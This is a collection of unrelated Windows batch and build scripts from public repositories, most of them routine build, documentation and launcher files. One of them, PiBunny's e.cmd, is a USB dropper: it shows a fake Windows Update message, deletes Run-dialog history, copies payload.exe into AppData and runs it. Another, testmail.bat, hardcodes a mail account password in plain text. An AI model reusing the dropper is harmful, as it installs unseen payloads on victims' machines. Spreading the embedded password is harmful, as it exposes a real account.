pip install -U pip
pip install "Cython>=0.29"
python setup.py build_ext ^
--with-parquet ^
--with-static-boost ^
--bundle-arrow-cpp ^
bdist_wheel || exit /B
popd
@rem test the wheel
call deactivate
conda create -n wheel-test -q -y python=%PYTHON% ^
numpy=%NUMPY% pandas pytest hypothesis
call activate wheel-test
pip install --no-index --find-links=%ARROW_SRC%\python\dist\ pyarrow
python -c "import pyarrow; import pyarrow.parquet"
pytest --pyargs pyarrow
| tebeka/arrow | dev/tasks/python-wheels/win-build.bat | bat | apache-2.0 | 2,817 |
gradlew build dist
pause | Col-E/LastTry | build.bat | bat | mit | 24 |
@echo off
"%~dp0\mono.exe" %MONO_OPTIONS% "%~dp0\..\lib\mono\4.5\pdb2mdb.exe" %*
| Code0100Food/3DEngine | MonoScripting/MonoScripting/DATA/bin/pdb2mdb.bat | bat | mit | 81 |
xwalk.exe http://webstore.limexgames.net/ag_cargo_bridge/index.html
| qiuzhong/crosswalk-test-suite | misc/sampleapp-windows-tests/res/Cargo_Bridge.bat | bat | bsd-3-clause | 68 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. changes to make an overview over all changed/added/deprecated items
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\osxpython.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\osxpython.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
:end
| thusoy/clint | docs/make.bat | bat | isc | 4,112 |
@REM Build Documentation for every debug xll
@for %%1 in (Debug\*.xll) do call "%XLW%\xlw\build\sandcastle\BuildChmHelp.bat" "%%~n1" vc11
| red2901/sandbox | xlw/xlw-5.0.2f0/xlwDotNet/Template_Projects/Hybrid_Cpp_CSharp_XLLs/VS12_PRO/BuildHelp.bat | bat | mit | 139 |
protoc --proto_path=./Proto/src --csharp_out=../Client/Assets/Scripts/Net/proto ./Proto/src/*.proto
protoc --proto_path=./Proto/src --go_out=../Server/src/server/msg ./Proto/src/*.proto
python3 gen_proto.py | Mikejinhua/UnitySocketProtobuf3Demo | Tools/GenProto.bat | bat | mit | 208 |
@echo off
set TabName=DTIControls
set currdir=%~dp0
set DllName="..\Bin\DTIControls.dll"
set ControlsFolder="%userprofile%\My Documents\Visual Studio 2005\Controls\%TabName%"
"%currdir%\Toolbox.exe" /silent /vs2005 /installdesktop %DllName% "%TabName%"
"%currdir%\Toolbox.exe" /silent /vs2008 /installdesktop %DllName% "%TabName%"
set ControlsFolder="%userprofile%\My Documents\Visual Studio 2010\Controls\%TabName%"
mkdir %ControlsFolder%
copy %DllName% %ControlsFolder%
"%VS100COMNTOOLS%\..\IDE\devenv.exe" /command Tools.InstallCommunityControls /command File.Exit | Micmaz/DTIControls | DTIControllsInstaller/registerTools.bat | bat | mit | 568 |
@IF EXIST "%~dp0\node.exe" (
"%~dp0\node.exe" "%~dp0\..\..\..\nearley\bin\nearley-unparse.js" %*
) ELSE (
@SETLOCAL
@SET PATHEXT=%PATHEXT:;.JS;=;%
node "%~dp0\..\..\..\nearley\bin\nearley-unparse.js" %*
) | SpatialMap/SpatialMapDev | node_modules/css-to-react-native/node_modules/.bin/nearley-unparse.cmd | bat | mit | 214 |
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage.
REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT
REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like).
copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe
REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it).
REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup
REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it).
start "" "%APPDATA%\payload.exe" --startup
REM Blink CAPSLOCK key (from usb_exfiltrator)
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit | tholum/PiBunny | system.d/library/ExecutableInstaller/e.cmd | bat | mit | 1,273 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Pybtex.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Pybtex.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
:end
| live-clones/pybtex | docs/make.bat | bat | mit | 6,710 |
:: Use this to find out which ports are in use
netstat -ano | find "ABHÖREN"
| ceddie/bptc_wallet | tools/scripts/ports.bat | bat | mit | 78 |
@echo off
echo *** %~n0 ...
echo *** %1
call %~dp0\_init.bat %1 %2 %3
SET MergeName=_merge-60cm
SET VrtParams=-vrtnodata 255
SET PixelSize=-tr 0.6 0.6 -r average
gdalbuildvrt %VrtParams% %MergeName%.vrt *%SrcExt%
gdal_translate %TiffOpts% %PixelSize% %MergeName%.vrt ..\%MergeName%.tif
call %~dp0\raster-pyramid.bat ..\%MergeName%.tif
:: %~dp0\raster-calc-stats.bat %MergeName%.tif
echo.
echo %~n0 finished.
timeout 30 | kubaszostak/gdal-dragndrop | raster-merge-06m.bat | bat | mit | 427 |
@echo off
@rem ***************************************************************
@rem ** Author: DANG Hoang Minh
@rem **
@rem ** testmail.bat
@rem **
@rem ** This script is used to test execute command in Windows
@rem ** sendmail with report attached.
@rem **
@rem ** Usage: testmail
@rem **
@rem ***************************************************************
@echo off
set [email protected]
set [email protected]
set [email protected]
set mail_subject=[Test mail] Candidate finished the exam %date:~10,4%%date:~4,2%%date:~7,2%
@rem ** Here is the message body
setlocal EnableDelayedExpansion
set mail_msg=Hello,^
^
I have finished my exam, please check.^
^
This is a test mail.^
^
Thanks,^
Minh
set mail_server=webmail.pentalog.fr
set [email protected]
set auth_pwd=Pentalog123
set report_path="C:\Users\mdanghoang\Downloads\jenkins_result.jpg"
D:\Programs\sendEmail\sendEmail -f %mail_from% -t %mail_to% -cc %mail_cc% -u %mail_subject% -m !mail_msg! -s %mail_server% -xu %auth_user% -xp %auth_pwd% -a %report_path%
@rem ** End of script | mdanghoang/codiad-custom | components/shell_script/script/testmail.bat | bat | mit | 1,155 |
@REM ----------------------------------------------------------------------------
@REM Copyright 2001-2006 The Apache Software Foundation.
@REM
@REM Licensed under the Apache License, Version 2.0 (the "License");
@REM you may not use this file except in compliance with the License.
@REM You may obtain a copy of the License at
@REM
@REM http://www.apache.org/licenses/LICENSE-2.0
@REM
@REM Unless required by applicable law or agreed to in writing, software
@REM distributed under the License is distributed on an "AS IS" BASIS,
@REM WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
@REM See the License for the specific language governing permissions and
@REM limitations under the License.
@REM ----------------------------------------------------------------------------
@REM
@REM Copyright (c) 2001-2006 The Apache Software Foundation. All rights
@REM reserved.
@echo off
set ERROR_CODE=0
:init
@REM Decide how to startup depending on the version of windows
@REM -- Win98ME
if NOT "%OS%"=="Windows_NT" goto Win9xArg
@REM set local scope for the variables with windows NT shell
if "%OS%"=="Windows_NT" @setlocal
@REM -- 4NT shell
if "%eval[2+2]" == "4" goto 4NTArgs
@REM -- Regular WinNT shell
set CMD_LINE_ARGS=%*
goto WinNTGetScriptDir
@REM The 4NT Shell from jp software
:4NTArgs
set CMD_LINE_ARGS=%$
goto WinNTGetScriptDir
:Win9xArg
@REM Slurp the command line arguments. This loop allows for an unlimited number
@REM of arguments (up to the command line limit, anyway).
set CMD_LINE_ARGS=
:Win9xApp
if %1a==a goto Win9xGetScriptDir
set CMD_LINE_ARGS=%CMD_LINE_ARGS% %1
shift
goto Win9xApp
:Win9xGetScriptDir
set SAVEDIR=%CD%
%0\
cd %0\..\..
set BASEDIR=%CD%
cd %SAVEDIR%
set SAVE_DIR=
goto repoSetup
:WinNTGetScriptDir
for %%i in ("%~dp0..") do set "BASEDIR=%%~fi"
:repoSetup
set REPO=
if exist "%BASEDIR%\bin\setup.bat" call "%BASEDIR%\bin\setup.bat"
if "%JAVACMD%"=="" set JAVACMD=java
if "%REPO%"=="" set REPO=%BASEDIR%\repo
set CLASSPATH=
set ENDORSED_DIR=foo
if NOT "%ENDORSED_DIR%" == "" set CLASSPATH="%BASEDIR%"\%ENDORSED_DIR%\*;%CLASSPATH%
if NOT "%CLASSPATH_PREFIX%" == "" set CLASSPATH=%CLASSPATH_PREFIX%;%CLASSPATH%
@REM Reaching here means variables are defined and arguments have been captured
:endInit
%JAVACMD% %JAVA_OPTS% Yo dude -classpath %CLASSPATH% -Dapp.name="test-endorsed-lib" -Dapp.repo="%REPO%" -Dapp.home="%BASEDIR%" -Dbasedir="%BASEDIR%" foo.Bar %CMD_LINE_ARGS%
if %ERRORLEVEL% NEQ 0 goto error
goto end
:error
if "%OS%"=="Windows_NT" @endlocal
set ERROR_CODE=%ERRORLEVEL%
:end
@REM set local scope for the variables with windows NT shell
if "%OS%"=="Windows_NT" goto endNT
@REM For old DOS remove the set variables from ENV - we assume they were not set
@REM before we started - at least we don't leave any baggage around
set CMD_LINE_ARGS=
goto postExec
:endNT
@REM If error code is set to 1 then the endlocal was done already in :error.
if %ERROR_CODE% EQU 0 @endlocal
:postExec
if "%FORCE_EXIT_ON_ERROR%" == "on" (
if %ERROR_CODE% NEQ 0 exit %ERROR_CODE%
)
exit /B %ERROR_CODE%
| mojohaus/appassembler | appassembler-maven-plugin/src/test/resources/org/codehaus/mojo/appassembler/daemon/script/expected-test-endorsed-lib.bat | bat | mit | 3,207 |
@echo off
pushd "%~dp0"
NAnt -buildfile:NAnt.build Easemob.Restfull4Net_BuildOut_Debug
pause | easonjim/Easemob.Restfull4Net | [1]Build_Debug.cmd | bat | mit | 95 |
cmd_util-linux/rdev.o := arm-linux-musleabihf-gcc -Wp,-MD,util-linux/.rdev.o.d -std=gnu99 -Iinclude -Ilibbb -include include/autoconf.h -D_GNU_SOURCE -DNDEBUG -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -D"BB_VER=KBUILD_STR(1.22.1)" -DBB_BT=AUTOCONF_TIMESTAMP -Wall -Wshadow -Wwrite-strings -Wundef -Wstrict-prototypes -Wunused-function -Wunused-value -Wmissing-prototypes -Wmissing-declarations -Wno-format-security -Wdeclaration-after-statement -Wold-style-definition -fno-builtin-strlen -finline-limit=0 -fomit-frame-pointer -ffunction-sections -fdata-sections -fno-guess-branch-probability -funsigned-char -static-libgcc -falign-functions=1 -falign-jumps=1 -falign-labels=1 -falign-loops=1 -fno-unwind-tables -fno-asynchronous-unwind-tables -g -O0 -D"KBUILD_STR(s)=\#s" -D"KBUILD_BASENAME=KBUILD_STR(rdev)" -D"KBUILD_MODNAME=KBUILD_STR(rdev)" -c -o util-linux/rdev.o util-linux/rdev.c
deps_util-linux/rdev.o := \
util-linux/rdev.c \
include/libbb.h \
$(wildcard include/config/feature/shadowpasswds.h) \
$(wildcard include/config/use/bb/shadow.h) \
$(wildcard include/config/selinux.h) \
$(wildcard include/config/feature/utmp.h) \
$(wildcard include/config/locale/support.h) \
$(wildcard include/config/use/bb/pwd/grp.h) \
$(wildcard include/config/lfs.h) \
$(wildcard include/config/feature/buffers/go/on/stack.h) \
$(wildcard include/config/feature/buffers/go/in/bss.h) \
$(wildcard include/config/feature/ipv6.h) \
$(wildcard include/config/feature/seamless/xz.h) \
$(wildcard include/config/feature/seamless/lzma.h) \
$(wildcard include/config/feature/seamless/bz2.h) \
$(wildcard include/config/feature/seamless/gz.h) \
$(wildcard include/config/feature/seamless/z.h) \
$(wildcard include/config/feature/check/names.h) \
$(wildcard include/config/feature/prefer/applets.h) \
$(wildcard include/config/long/opts.h) \
$(wildcard include/config/feature/getopt/long.h) \
$(wildcard include/config/feature/pidfile.h) \
$(wildcard include/config/feature/syslog.h) \
$(wildcard include/config/feature/individual.h) \
$(wildcard include/config/echo.h) \
$(wildcard include/config/printf.h) \
$(wildcard include/config/test.h) \
$(wildcard include/config/kill.h) \
$(wildcard include/config/chown.h) \
$(wildcard include/config/ls.h) \
$(wildcard include/config/xxx.h) \
$(wildcard include/config/route.h) \
$(wildcard include/config/feature/hwib.h) \
$(wildcard include/config/desktop.h) \
$(wildcard include/config/feature/crond/d.h) \
$(wildcard include/config/use/bb/crypt.h) \
$(wildcard include/config/feature/adduser/to/group.h) \
$(wildcard include/config/feature/del/user/from/group.h) \
$(wildcard include/config/ioctl/hex2str/error.h) \
$(wildcard include/config/feature/editing.h) \
$(wildcard include/config/feature/editing/history.h) \
$(wildcard include/config/feature/editing/savehistory.h) \
$(wildcard include/config/feature/tab/completion.h) \
$(wildcard include/config/feature/username/completion.h) \
$(wildcard include/config/feature/editing/vi.h) \
$(wildcard include/config/feature/editing/save/on/exit.h) \
$(wildcard include/config/pmap.h) \
$(wildcard include/config/feature/show/threads.h) \
$(wildcard include/config/feature/ps/additional/columns.h) \
$(wildcard include/config/feature/topmem.h) \
$(wildcard include/config/feature/top/smp/process.h) \
$(wildcard include/config/killall.h) \
$(wildcard include/config/pgrep.h) \
$(wildcard include/config/pkill.h) \
$(wildcard include/config/pidof.h) \
$(wildcard include/config/sestatus.h) \
$(wildcard include/config/unicode/support.h) \
$(wildcard include/config/feature/mtab/support.h) \
$(wildcard include/config/feature/clean/up.h) \
$(wildcard include/config/feature/devfs.h) \
include/platform.h \
$(wildcard include/config/werror.h) \
$(wildcard include/config/big/endian.h) \
$(wildcard include/config/little/endian.h) \
$(wildcard include/config/nommu.h) \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/limits.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/features.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/limits.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/byteswap.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/stdint.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/alltypes.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/stdint.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/endian.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/stdbool.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/unistd.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/posix.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/ctype.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/dirent.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/errno.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/errno.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/fcntl.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/fcntl.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/inttypes.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/netdb.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/netinet/in.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/socket.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/socket.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/setjmp.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/setjmp.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/signal.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/signal.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/stdio.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/stdlib.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/alloca.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/stdarg.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/stddef.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/string.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/strings.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/libgen.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/poll.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/ioctl.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/ioctl.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/mman.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/mman.h \
